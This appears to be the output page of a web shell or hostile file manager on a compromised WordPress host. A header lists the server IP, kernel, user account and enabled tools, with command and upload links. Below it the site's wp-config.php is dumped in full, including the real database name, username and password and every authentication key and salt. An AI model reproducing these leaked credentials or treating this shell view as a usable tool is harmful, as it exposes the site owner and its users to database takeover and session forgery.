Server IP : 213.176.29.180  /  Your IP : 18.189.180.236
Web Server : Apache
System : Linux 213.176.29.180.hostiran.name 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
User : webtaragh ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home/webtaragh/www/wp-content/../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/webtaragh/www/wp-content/../wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'webtaragh_webtaragh.ir' );

/** Database username */
define( 'DB_USER', 'webtaragh_webtaragh' );

/** Database password */
define( 'DB_PASSWORD', '@AliReza123456' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '?C+E9u =7d#iIGpl1,9&j=F}c5pi>~{@nCXdjALel>x&9[ClT#n*g3,Dj.ojGL25' );
define( 'SECURE_AUTH_KEY',  ' zlmVZ|5XhzVQ]j7c^6:HvfSkiZ}_5B!nYW8Y,^yw*x>xV8{Bm=#nX;[6X`:t<.i' );
define( 'LOGGED_IN_KEY',    'UQQn $]_^x=[A.L_n1]aIfr?NI%P:|l1CFxTx/VoL/ZEx( ?E1Un:0?|UiO~)aQP' );
define( 'NONCE_KEY',        'yL%P637f#4&yJb&+:#-u,c5*YGGwarWW1K*v>Ut_>0TN$WX&P=2LBLh1ZrFZ32TA' );
define( 'AUTH_SALT',        'PG0ly)6DHS/*p0;e)nn?PC2(LXr|j7b4Fvj;I<O*K]n,R!p7eOG>x)A3,{_[4V~;' );
define( 'SECURE_AUTH_SALT', 'hxO8TL%3fT`|p^Eag136Cbu9<~Y_6lqz=6~x4L7VkwaY#tX4 Q!(}ye41QA#Y@R/' );
define( 'LOGGED_IN_SALT',   'Wg&*:q ]6NJ.k:)m#=Vz~DZh?`/vMp99x_}i3wFGMq}S$D (hmWN0{3xh#JHAOAP' );
define( 'NONCE_SALT',       '*.3N{|b4F?h>`y7AaC2no|[$o(77,Gc+(IBjv*^f]rw/Yh0C^|XEVXPJ@+Ks%Xk[' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';